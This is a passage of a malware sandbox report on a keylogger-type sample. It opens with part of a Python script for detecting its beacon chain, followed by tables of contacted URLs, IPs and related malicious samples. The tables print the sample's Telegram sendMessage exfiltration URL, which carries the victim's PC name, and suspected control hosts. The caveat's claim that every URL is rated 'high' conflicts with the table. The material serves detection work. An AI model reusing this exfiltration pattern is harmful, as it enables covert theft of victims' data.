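    "2025-03-09T01:03:30Z 10.0.0.9 GET https://api.telegram.org/bot/getMe",
]

if __name__ == "__main__":
    print(decode_beacon(BEACON_URL))
    print(find_beacon_chains(SAMPLE_LOG))
```

Two caveats for real telemetry. Without TLS inspection the two HTTPS requests appear only as CONNECT reallyfreegeoip.org:443 and CONNECT api.telegram.org:443, so match on host or SNI there and keep the full-URL decode for inspected or sandbox-captured traffic. The Bot API is also used by legitimate software, which is why the chain, not the Telegram call alone, is the signal (10.0.0.9 is not flagged) and why every one of these URLs carries a "high" reputation and "false" malicious verdict in the table above.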
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003300F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033019000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en4 | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | OW1i3n5K3s.exe | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/4 | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032EF9000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F3F000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | OW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/5 | OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032ECF000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.32.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
172.217.16.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.184.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632404
Start date and time: 2025-03-07 23:27:57 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OW1i3n5K3s.exe (renamed because the original name is a hash value)
Original Sample Name: 702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/15@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 209
• Number of non-executed functions: 125
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10
• Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:29:28 | API Interceptor | 668087x Sleep call for process: OW1i3n5K3s.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
132.226.8.169 | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | AEo2XQmxqZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.8.169 | CWu89IbJQw.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | NDCNDvC27F.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | TfRJR0Y3uW.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.8.169 | DNNueAb5UZ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | NmuA605dM4.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.8.169 | 4PYRGCo1Di.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.8.169 | XiJhd7Lx30.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
149.154.167.220 | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse |
149.154.167.220 | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse |
149.154.167.220 | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse |
104.21.32.1 | MmF9tcIj1J.exe | Get hash | malicious | FormBook | Browse | www.newanthoperso.shop/lqfq/
104.21.32.1 | Payment Invoice ref0306252.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/a669/
104.21.32.1 | DHL AWB Receipt_pdf.bat.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/2dxw/
104.21.32.1 | RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe | Get hash | malicious | FormBook | Browse | www.kdrqcyusevx.info/k7wl/
104.21.32.1 | PRI_VTK250419A.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/scc1/five/fre.php
104.21.32.1 | Stormwater Works Drawings Spec.js | Get hash | malicious | FormBook | Browse | www.tumbetgirislinki.fit/k566/
104.21.32.1 | SFT20020117.exe | Get hash | malicious | FormBook | Browse | www.fz977.xyz/7p42/
104.21.32.1 | PO from tpc Type 34.1 34,2 35 Spec.js | Get hash | malicious | FormBook | Browse | www.tumbetgirislinki.fit/k566/
104.21.32.1 | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook | Browse | www.clouser.store/3r9x/
104.21.32.1 | PO 87877889X,pdf.Vbs.vbs | Get hash | malicious | FormBook | Browse | www.tumbetgirislinki.fit/k566/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1
reallyfreegeoip.org | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
reallyfreegeoip.org | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1
reallyfreegeoip.org | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.96.1
reallyfreegeoip.org | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
reallyfreegeoip.org | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
reallyfreegeoip.org | BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.80.1
reallyfreegeoip.org | lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
reallyfreegeoip.org | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.64.1
reallyfreegeoip.org | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1
api.telegram.org | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
api.telegram.org | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse | 149.154.167.220
api.telegram.org | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
checkip.dyndns.com | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 158.101.44.242
checkip.dyndns.com | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
checkip.dyndns.com | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
TELEGRAMRU | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse | 149.154.167.220
TELEGRAMRU | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
UTMEMUS | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
UTMEMUS | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
UTMEMUS | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
UTMEMUS | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
UTMEMUS | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
UTMEMUS | AEo2XQmxqZ.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.8.169
UTMEMUS | l9inNHJqHS.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
UTMEMUS | CWu89IbJQw.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
CLOUDFLARENETUS | Dropper.exe | Get hash | malicious | AsyncRAT, Trap Stealer, XWorm | Browse | 162.159.135.232
CLOUDFLARENETUS | XFo9jVGyLQ.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.96.1
CLOUDFLARENETUS | 44zFWmsOGn.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.112.1
CLOUDFLARENETUS | 6KzB3ReZ6z.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
CLOUDFLARENETUS | UqdykLLTA2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1
CLOUDFLARENETUS | 3JZ4CUFqSs.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
CLOUDFLARENETUS | GBYfjUz4a5.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.96.1
CLOUDFLARENETUS | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
CLOUDFLARENETUS | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
CLOUDFLARENETUS | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adXFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            37f463bf4616ecd445d4a1937da06e19GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            2Jq4fZJIJ8.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            GyGE2VaBFL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            1258ad6Jpw.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            ZUY4Nq2SyY.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 172.217.16.129
                                                                                                                            • 142.250.184.206
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dllfacturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              Factura proforma.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                Contract-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  Contract-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    m4JIZpBl3o.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      UMOWA_20.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                        JOWcitzTY4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          dBMacros.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            dBMacros.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              PSAP_toolkit.exeGet hashmaliciousUnknownBrowse
Process: C:\Users\user\Desktop\OW1i3n5K3s.exe
File Type: OpenPGP Secret Key
Category: dropped
Size (bytes): 13445828
Entropy (8bit): 0.5814945257046591
Encrypted: false
SSDEEP: 12288:+Rr4EpfFtVO3Q+djgV6M4MugJGjH8jo80Wvepc:OsEpFtVO3QxGjcjWq
MD5: 2DC23F60FD8E5F721773594F15AF4A2A
SHA1: C97C0646BB27235F768246231275AA94A02B70B9
SHA-256: 58D78BC7A7EE0C1DC9FB3AA9E12BC8274E072BC8E8D6FFB0B64F9B96347A403D
SHA-512: A64302EE8A50113D156A93670DD8B306CE9622A3D36914346E870CE3DA07B5369446914DB499CA8FAF948F4991B0C903E7E1A0FE23AA9E120D4C3DA099203EC0
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\OW1i3n5K3s.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
